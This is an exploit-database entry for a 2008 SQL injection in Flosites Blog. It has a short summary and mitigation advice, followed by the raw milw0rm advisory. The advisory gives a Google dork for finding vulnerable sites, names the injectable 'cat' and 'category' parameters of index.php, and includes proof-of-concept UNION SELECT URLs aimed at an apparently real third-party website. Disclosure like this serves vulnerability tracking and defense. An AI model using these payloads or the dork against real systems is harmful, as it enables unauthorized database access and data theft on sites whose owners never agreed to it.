header-logo
Suggest Exploit
vendor:
Flosites Blog
by:
Vrs-hCk
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Flosites Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Multiple SQL Injection Vulnerability

Multiple SQL Injection vulnerabilities exist in Flosites Blog. An attacker can exploit these vulnerabilities by sending malicious SQL queries to the vulnerable application. This can be done by sending a specially crafted HTTP request to the vulnerable application. The attacker can use the UNION operator to extract data from the database. The attacker can also use the SQL injection vulnerability to execute administrative operations on the database such as shutdown the DBMS or dump the database content to the attacker.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being passed to the database. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

===========================================================================================
[-] Title    : Multiple SQL Injection Vulnerability
[-] Software : Flosites Blog
[-] Vendor   : www.flosites.com
[-] Date     : 17 November 2008 (Indonesia)
[-] Author   : Vrs-hCk
[-] Contact  : d00r[at]telkom.net
[-] Blog     : http://c0li.blogspot.com/
===========================================================================================

[+] Google Dork

    "blog by flosites"

[+] Exploit

    http://[site]/[path]/index.php?cat=-1 [SQL]/*
    http://[site]/[path]/index.php?category=-1 [SQL]/*

[+] Proof of Concept

    http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*
    http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*

===========================================================================================
[-] Greetz   : 
    www.MainHack.com - www.ServerIsDown.org - #papuahacker crew - #nob0dy Crew @ DALnet
    Paman, NoGe, OoN_Boy, H312Y, pizzyroot, xx_user, bL4Ck_3n91n3, culun_borneo, s3t4n,
    Angela Chang, terbang_melayang, IrcMafia, loqsa, str0ke, em|nem, dkk ...
===========================================================================================

# milw0rm.com [2008-11-16]